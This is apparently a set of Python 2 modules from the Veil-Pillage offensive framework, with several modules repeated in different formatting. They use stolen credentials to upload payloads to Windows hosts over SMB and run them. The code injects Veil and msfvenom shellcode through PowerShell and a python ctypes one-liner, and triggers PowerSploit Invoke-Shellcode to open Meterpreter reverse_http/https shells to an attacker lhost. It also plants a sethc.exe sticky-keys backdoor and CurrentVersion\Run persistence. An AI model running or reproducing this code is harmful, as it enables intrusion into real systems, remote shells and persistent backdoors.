def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
spawnHandler = self.required_options["spawn_handler"][0]
# create our powershell payload
p = virtual.Payload()
# pull out any msfpayload payloads/options
if self.args.msfpayload:
p.shellcode.SetPayload(
[self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
p.shellcode.setCustomShellcode(self.args.custshell)
# get the powershell command
powershellCommand = p.generate()
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
"...")
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# turn the payload shellcode object into a handler script
handlerPath = helpers.shellcodeToHandler(p.shellcode)
# make sure a handler was returned
if handlerPath != "":
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n\n [>] Press enter when handler is ready: ")
for target in self.targets:
print helpers.color(" [*] Triggering powershell command on " +
target)
# execute the powershell command on each host
command_methods.executeCommand(target, username, password,
powershellCommand, triggerMethod)
self.output += "[*] Powershell inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"
# build our cleanup file -> kill all powershell processes
killCMD = "taskkill /f /im powershell.exe"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
spawnHandler = self.required_options["spawn_handler"][0]
# create our powershell payload
p = virtual.Payload()
# pull out any msfpayload payloads/options
if self.args.msfpayload:
p.shellcode.SetPayload([self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
p.shellcode.setCustomShellcode(self.args.custshell)
# get the powershell command
powershellCommand = p.generate()
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# turn the payload shellcode object into a handler script
handlerPath = helpers.shellcodeToHandler(p.shellcode)
# make sure a handler was returned
if handlerPath != "":
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n\n [>] Press enter when handler is ready: ")
for target in self.targets:
print helpers.color(" [*] Triggering powershell command on "+target)
# execute the powershell command on each host
command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod)
self.output += "[*] Powershell inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"
# build our cleanup file -> kill all powershell processes
killCMD = "taskkill /f /im powershell.exe"
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
uploadName = self.required_options["upload_name"][0]
# if we're using Veil-Evasion for payload generation
if self.required_options["exe_path"][0].lower() == "veil":
# create a Veil-Evasion controller object for payload generation
con = controller.Controller()
# check various possibly flags passed by the command line
# if we don't have payload specified, jump to the main controller menu
if not self.args.p:
payloadPath = con.MainMenu()
# otherwise, set all the appropriate payload options
else:
# pull out any required options from the command line and
# build the proper dictionary so we can set the payload manually
options = {}
if self.args.c:
options['required_options'] = {}
for option in self.args.c:
name,value = option.split("=")
options['required_options'][name] = [value, ""]
# pull out any msfvenom shellcode specification and msfvenom options
if self.args.msfpayload:
options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]
# manually set the payload in the controller object
con.SetPayload(self.args.p, options)
# generate the payload code
code = con.GeneratePayload()
# grab the generated payload .exe name
payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)
# nicely print the title and module name again (since Veil-Evasion trashes this)
messages.title()
print " [*] Executing module: " + helpers.color(self.name) + "..."
# sanity check if the user exited Veil-Evasion execution
if not payloadPath or payloadPath == "":
print helpers.color(" [!] No output from Veil-Evasion", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# if we have a custom-specified .exe, use that instead
else:
payloadPath = self.required_options["exe_path"][0]
# if the .exe path doesn't exist, print and error and return
if not os.path.exists(payloadPath):
print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# make sure the name ends with ".exe"
if not uploadName.endswith(".exe"):
uploadName += ".exe"
# copy the resulting binary into the temporary directory with the appropriate name
os.system("cp "+payloadPath+" /tmp/"+uploadName)
for target in self.targets:
baseName = payloadPath.split("/")[-1]
# upload the payload to C:\Windows\System32\
smb.uploadFile(target, username, password, "C$", "\\Windows\\","/tmp/"+uploadName)
self.output += "[*] Binary '"+baseName+"' uploaded to C:\\Windows\\"+uploadName+" using creds '"+username+":"+password+"' on : " + target + "\n"
# the registry command to set up the sethc stickkeys backdoor for the binary
sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\"+uploadName+"\""
# execute the sethc command and get the result
sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)
if sethcResult == "":
self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
elif "The operation completed successfully" in sethcResult:
self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"
# build our cleanup -> deleting this registry run value
cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
def run(self):
handlerPath = "none"
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
spawnHandler = self.required_options["spawn_handler"][0]
# nab up some shellcode from Veil-Evasion
sc = shellcode.Shellcode()
# set the payload to use, if specified
if self.args.msfpayload:
sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
sc.setCustomShellcode(self.args.custshell)
# base64 our shellcode
b64sc = base64.b64encode(sc.generate().decode("string_escape"))
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
"...")
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# turn our shellcode object into a handler script
handlerPath = helpers.shellcodeToHandler(sc)
# make sure a handler was returned
if handlerPath != "":
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n\n [>] Press enter when handler is ready: ")
# otherwise, if we have a custom handler path, try to invoke that
elif handlerPath.lower() != "none":
if os.path.isdir(handlerPath):
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n [>] Press enter when handler is ready: ")
else:
print helpers.color(" [!] Warning: handlerPath '" +
handlerPath + "' not valid!")
else:
pass
# command to unzip the uploaded python installation
unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
# path to the 7zip binary
zipPath = settings.VEIL_PILLAGE_PATH + "/data/environments/7za.exe"
# command to invoke shellcode using python
pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" % (
b64sc)
# path to the minial python isntall
pythonPath = settings.VEIL_PILLAGE_PATH + "/data/environments/python.zip"
for target in self.targets:
# upload the 7zip.exe binary and the python install
uploadResult = smb.uploadFiles(target, username, password, "C$",
"\\Windows\\Temp\\",
[zipPath, pythonPath])
if uploadResult == "success":
self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"
print helpers.color(" [*] Triggering 7zip unzip command on " +
target)
command_methods.executeCommand(target, username, password,
unzipCommand, triggerMethod)
self.output += "[*] 7za unzip command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"
print helpers.color(" [*] Triggering 'python -c' command on " +
target)
command_methods.executeCommand(target, username, password,
pythonCMD, triggerMethod)
self.output += "[*] 'python -c' inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"
# build our cleanup file -> kill all python processes and delete the environments
killCMD = "taskkill /f /im python.exe"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
# command to delete the python extracted directory, zipped python environment and 7za.exe binary
delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + delCMD + "|" + triggerMethod + "\n"
else:
self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"
print helpers.color(
"[!] 7za.exe and python.zip unsuccessfully uploaded to " +
target + "\n",
warning=True)
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
uploadName = self.required_options["upload_name"][0]
key_name = self.required_options["key_name"][0]
# if we're using Veil-Evasion for payload generation
if self.required_options["exe_path"][0].lower() == "veil":
# create a Veil-Evasion controller object for payload generation
con = controller.Controller()
# if we don't have payload specified, jump to the main controller menu
if not self.args.p:
payloadPath = con.MainMenu()
# otherwise, set all the appropriate payload options
else:
# pull out any required options from the command line and
# build the proper dictionary so we can set the payload manually
options = {}
if self.args.c:
options['required_options'] = {}
for option in self.args.c:
name, value = option.split("=")
options['required_options'][name] = [value, ""]
# pull out any msfvenom shellcode specification and msfvenom options
if self.args.msfpayload:
options['msfvenom'] = [
self.args.msfpayload, self.args.msfoptions
]
# manually set the payload in the controller object
con.SetPayload(self.args.p, options)
# generate the payload code
code = con.GeneratePayload()
# grab the generated payload .exe name
payloadPath = con.OutputMenu(con.payload,
code,
showTitle=True,
interactive=False)
# nicely print the title and module name again (since Veil-Evasion trashes this)
messages.title()
print " [*] Executing module: " + helpers.color(self.name) + "..."
# sanity check if the user exited Veil-Evasion execution
if not payloadPath or payloadPath == "":
print helpers.color(" [!] No output from Veil-Evasion",
warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# if we have a custom-specified .exe, use that instead
else:
payloadPath = self.required_options["exe_path"][0]
# if the .exe path doesn't exist, print and error and return
if not os.path.exists(payloadPath):
print helpers.color("\n\n [!] Invalid .exe path specified",
warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# make sure the name ends with ".exe"
if not uploadName.endswith(".exe"):
uploadName += ".exe"
# copy the resulting binary into the temporary directory with the appropriate name
os.system("cp " + payloadPath + " /tmp/" + uploadName)
for target in self.targets:
baseName = payloadPath.split("/")[-1]
# upload the payload to C:\Windows\System32\
smb.uploadFile(target, username, password, "C$", "\\Windows\\",
"/tmp/" + uploadName)
self.output += "[*] Binary '" + baseName + "' uploaded to C:\\Windows\\" + uploadName + " using creds '" + username + ":" + password + "' on : " + target + "\n"
# the registry command to set up the sethc stickkeys backdoor for the binary
regCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /f /v " + key_name + " /t REG_SZ /d \"C:\\Windows\\" + uploadName + "\""
# execute the sethc command and get the result
sethcResult = command_methods.executeResult(
target, username, password, regCommand, triggerMethod)
if sethcResult == "":
self.output += "[!] No result file, CurrentVersion\\Run registry command failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "The operation completed successfully" in sethcResult:
self.output += "[*] CurrentVersion\\Run successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"
# build our cleanup -> deleting this registry run value
cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v " + key_name + " /f"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
transport = self.required_options["transport"][0]
exe_path = self.required_options["exe_path"][0]
lhost = self.required_options["lhost"][0]
spawnHandler = self.required_options["spawn_handler"][0].lower()
# quick sanity check for host/execute logic before we continue...
if transport.lower() == "host":
# if 'host' is given for a transport method but no lhost is specified
if lhost == "none" or lhost == "":
print helpers.color("\n [!] lhost needed when hosting a payload", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# if we're using Veil-Evasion for payload generation
if exe_path.lower() == "veil":
# create a Veil-Evasion controller object for payload generation
con = controller.Controller()
# check various possibly flags passed by the command line
# if we don't have payload specified, jump to the main controller menu
if not self.args.p:
payloadPath = con.MainMenu()
# otherwise, set all the appropriate payload options
else:
# pull out any required options from the command line and
# build the proper dictionary so we can set the payload manually
options = {}
if self.args.c:
options['required_options'] = {}
for option in self.args.c:
name,value = option.split("=")
options['required_options'][name] = [value, ""]
# pull out any msfvenom shellcode specification and msfvenom options
if self.args.msfpayload:
options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]
# manually set the payload in the controller object
con.SetPayload(self.args.p, options)
# generate the payload code
code = con.GeneratePayload()
# grab the generated payload .exe name
payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)
# nicely print the title and module name again (since Veil-Evasion trashes this)
messages.title()
print " [*] Executing module: " + helpers.color(self.name) + "..."
# sanity check if the user exited Veil-Evasion execution
if not payloadPath or payloadPath == "":
print helpers.color(" [!] No output from Veil-Evasion", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# if we have a custom-specified .exe, use that instead
else:
payloadPath = exe_path
# if the .exe path doesn't exist, print and error and return
if not os.path.exists(payloadPath):
print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# build the path to what the handler should be and
handlerPath = settings.HANDLER_PATH + payloadPath.split(".")[0].split("/")[-1] + "_handler.rc"
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n [>] Press enter when handler is ready: ")
# the hostTrigger method gets the whole target list so the smb hosting
# server doesn't have to be setup/torn down for each target
if transport.lower() == "host":
# if 'host' is given for a transport method but no lhost is specified
if lhost == "none":
print helpers.color("\n [!] lhost needed when hosting a payload", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
else:
# execute the host/trigger command with all the targers
process = delivery_methods.hostTrigger(self.targets, username, password, payloadPath, lhost, triggerMethod)
# build the command to kill that process
killCmd = "taskkill /f /im "+process
for target in self.targets:
self.output += "[*] Payload '\\\\"+lhost+"\\SYSTEM\\"+process+"' triggered using creds '"+username+":"+password+"' on : " + target + "\n"
# build our cleanup file to kill the process
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCmd+"|"+triggerMethod+"\n"
# assume upload/trigger
else:
for target in self.targets:
# execute the upload/trigger command with all the targets
deliveredName = delivery_methods.uploadTrigger(target, username, password, payloadPath, triggerMethod)
self.output += "[*] Payload '"+deliveredName+"' uploaded and triggered using creds '"+username+":"+password+"' on : " + target + "\n"
# build the command to kill that process
killCmd = "taskkill /f /im "+deliveredName
# build our cleanup file to kill the process and delete the binary
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCmd+"|"+triggerMethod+"\n"
# sleep for 3 seconds
self.cleanup += "sleep|1\n"
# delete the file off
self.cleanup += "deletefile|"+target+"|"+username+"|"+password+"|C:\\Windows\\Temp\\"+deliveredName+"\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
trigger_method = self.required_options["trigger_method"][0]
payloadOption = self.required_options["payload"][0]
lhost = self.required_options["lhost"][0]
lport = self.required_options["lport"][0]
use_ssl = self.required_options["use_ssl"][0]
# sanity check
if trigger_method.lower() == "smbexec":
print helpers.color("\n\n [!] Error: smbexec will not work with powershell invocation",warning=True)
raw_input(" [*] press any key to return: ")
return ""
if payloadOption.lower() == "veil":
payload = "veil/shellcode"
# nab up some shellcode from Veil-Evasion
# users can set custom shellcode there
sc = shellcode.Shellcode()
# set the payload to use, if specified
if self.args.msfpayload:
sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
sc.setCustomShellcode(self.args.custshell)
# generate our shellcode and get it into the correct format
sc_raw = sc.generate()
sc_transformed = ",0".join(sc_raw.split("\\"))[1:]
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")
# command to invoke the appropriate shellcode in the script
scriptArguments = "Invoke-Shellcode -Force -Shellcode @(%s)" %(sc_transformed)
elif payloadOption.lower() == "http":
payload = "windows/meterpreter/reverse_http"
# command to invoke the appropriate shellcode in the script
scriptArguments = "Invoke-Shellcode -Payload "+payload+" -Lhost "+lhost+" -Lport "+lport+" -Force"
elif payloadOption.lower() == "https":
payload = "windows/meterpreter/reverse_https"
# command to invoke the appropriate shellcode in the script
scriptArguments = "Invoke-Shellcode -Payload "+payload+" -Lhost "+lhost+" -Lport "+lport+" -Force"
else:
print helpers.color("\n\n [!] Error: payload option "+payloadOption+" invalid, please enter http, or https", warning=True)
time.sleep(3)
return ""
# path to the PowerSploit Invoke-Shellcode.ps1 powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/PowerSploit/Invoke-Shellcode.ps1"
# trigger the powershell download on all targets
delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, trigger_method, ssl=use_ssl)
for target in self.targets:
self.output += "[*] Powersploit:Invoke-Shellcode payload="+payload+" lhost="+lhost+" lport="+lport+" triggered using creds '"+username+":"+password+"' on "+target+" using "+trigger_method+"\n"
# build our cleanup file -> kill all powershell processes
killCMD = "taskkill /f /im powershell.exe"
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+trigger_method+"\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
spawnHandler = self.required_options["spawn_handler"][0]
use_ssl = self.required_options["use_ssl"][0]
lhost = self.required_options["lhost"][0]
# nab up some shellcode from Veil-Evasion
# users can set custom shellcode there
sc = shellcode.Shellcode()
# set the payload to use, if specified
if self.args.msfpayload:
sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
sc.setCustomShellcode(self.args.custshell)
# generate our shellcode and get it into the correct format
sc_raw = sc.generate()
sc_transformed = ",0".join(sc_raw.split("\\"))[1:]
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
"...")
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# turn our shellcode object into a handler script
handlerPath = helpers.shellcodeToHandler(sc)
# make sure a handler was returned
if handlerPath != "":
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n\n [>] Press enter when handler is ready: ")
# path to the PowerSploit Invoke-ShellcodeMSIL.ps1 powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1"
# command to invoke the appropriate shellcode in the script
scriptArguments = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % (
sc_transformed)
# trigger the powershell download on all targets
delivery_methods.powershellHostTrigger(self.targets,
username,
password,
secondStagePath,
lhost,
scriptArguments,
triggerMethod,
ssl=use_ssl)
for target in self.targets:
self.output += "[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '" + username + ":" + password + "' on " + target + " using " + triggerMethod + "\n"
# build our cleanup file -> kill all powershell processes
killCMD = "taskkill /f /im powershell.exe"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
trigger_method = self.required_options["trigger_method"][0]
payloadOption = self.required_options["payload"][0]
lhost = self.required_options["lhost"][0]
lport = self.required_options["lport"][0]
use_ssl = self.required_options["use_ssl"][0]
# sanity check
if trigger_method.lower() == "smbexec":
print helpers.color(
"\n\n [!] Error: smbexec will not work with powershell invocation",
warning=True)
raw_input(" [*] press any key to return: ")
return ""
if payloadOption.lower() == "veil":
payload = "veil/shellcode"
# nab up some shellcode from Veil-Evasion
# users can set custom shellcode there
sc = shellcode.Shellcode()
# set the payload to use, if specified
if self.args.msfpayload:
sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
sc.setCustomShellcode(self.args.custshell)
# generate our shellcode and get it into the correct format
sc_raw = sc.generate()
sc_transformed = ",0".join(sc_raw.split("\\"))[1:]
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " +
helpers.color(self.name) + "...")
# command to invoke the appropriate shellcode in the script
scriptArguments = "Invoke-Shellcode -Force -Shellcode @(%s)" % (
sc_transformed)
elif payloadOption.lower() == "http":
payload = "windows/meterpreter/reverse_http"
# command to invoke the appropriate shellcode in the script
scriptArguments = "Invoke-Shellcode -Payload " + payload + " -Lhost " + lhost + " -Lport " + lport + " -Force"
elif payloadOption.lower() == "https":
payload = "windows/meterpreter/reverse_https"
# command to invoke the appropriate shellcode in the script
scriptArguments = "Invoke-Shellcode -Payload " + payload + " -Lhost " + lhost + " -Lport " + lport + " -Force"
else:
print helpers.color("\n\n [!] Error: payload option " +
payloadOption +
" invalid, please enter http, or https",
warning=True)
time.sleep(3)
return ""
# path to the PowerSploit Invoke-Shellcode.ps1 powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-Shellcode.ps1"
# trigger the powershell download on all targets
delivery_methods.powershellHostTrigger(self.targets,
username,
password,
secondStagePath,
lhost,
scriptArguments,
trigger_method,
ssl=use_ssl)
for target in self.targets:
self.output += "[*] Powersploit:Invoke-Shellcode payload=" + payload + " lhost=" + lhost + " lport=" + lport + " triggered using creds '" + username + ":" + password + "' on " + target + " using " + trigger_method + "\n"
# build our cleanup file -> kill all powershell processes
killCMD = "taskkill /f /im powershell.exe"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + trigger_method + "\n"
def run(self):
handlerPath = "none"
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
spawnHandler = self.required_options["spawn_handler"][0]
# nab up some shellcode from Veil-Evasion
sc = shellcode.Shellcode()
# set the payload to use, if specified
if self.args.msfpayload:
sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
sc.setCustomShellcode(self.args.custshell)
# base64 our shellcode
b64sc = base64.b64encode(sc.generate().decode("string_escape"))
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# turn our shellcode object into a handler script
handlerPath = helpers.shellcodeToHandler(sc)
# make sure a handler was returned
if handlerPath != "":
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n\n [>] Press enter when handler is ready: ")
# otherwise, if we have a custom handler path, try to invoke that
elif handlerPath.lower() != "none":
if os.path.isdir(handlerPath):
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n [>] Press enter when handler is ready: ")
else:
print helpers.color(" [!] Warning: handlerPath '"+handlerPath+"' not valid!")
else: pass
# command to unzip the uploaded python installation
unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
# path to the 7zip binary
zipPath = settings.VEIL_PILLAGE_PATH+"/data/environments/7za.exe"
# command to invoke shellcode using python
pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" %(b64sc)
# path to the minial python isntall
pythonPath = settings.VEIL_PILLAGE_PATH+"/data/environments/python.zip"
for target in self.targets:
# upload the 7zip.exe binary and the python install
uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath])
if uploadResult == "success":
self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"
print helpers.color(" [*] Triggering 7zip unzip command on " + target)
command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod)
self.output += "[*] 7za unzip command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"
print helpers.color(" [*] Triggering 'python -c' command on " + target)
command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod)
self.output += "[*] 'python -c' inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"
# build our cleanup file -> kill all python processes and delete the environments
killCMD = "taskkill /f /im python.exe"
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
# command to delete the python extracted directory, zipped python environment and 7za.exe binary
delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+delCMD+"|"+triggerMethod+"\n"
else:
self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"
print helpers.color("[!] 7za.exe and python.zip unsuccessfully uploaded to "+target+"\n", warning=True)
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
spawnHandler = self.required_options["spawn_handler"][0]
use_ssl = self.required_options["use_ssl"][0]
lhost = self.required_options["lhost"][0]
# nab up some shellcode from Veil-Evasion
# users can set custom shellcode there
sc = shellcode.Shellcode()
# set the payload to use, if specified
if self.args.msfpayload:
sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
# set custom shellcode if specified
elif self.args.custshell:
sc.setCustomShellcode(self.args.custshell)
# generate our shellcode and get it into the correct format
sc_raw = sc.generate()
sc_transformed = ",0".join(sc_raw.split("\\"))[1:]
# re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
messages.title()
sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# turn our shellcode object into a handler script
handlerPath = helpers.shellcodeToHandler(sc)
# make sure a handler was returned
if handlerPath != "":
# command to spawn a new tab
cmd = (
"gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '"
+ handlerPath
+ "'\""
)
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n\n [>] Press enter when handler is ready: ")
# path to the PowerSploit Invoke-ShellcodeMSIL.ps1 powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1"
# command to invoke the appropriate shellcode in the script
scriptArguments = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % (sc_transformed)
# trigger the powershell download on all targets
delivery_methods.powershellHostTrigger(
self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod, ssl=use_ssl
)
for target in self.targets:
self.output += (
"[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " using "
+ triggerMethod
+ "\n"
)
# build our cleanup file -> kill all powershell processes
killCMD = "taskkill /f /im powershell.exe"
self.cleanup += (
"executeCommand|"
+ target
+ "|"
+ username
+ "|"
+ password
+ "|"
+ killCMD
+ "|"
+ triggerMethod
+ "\n"
)
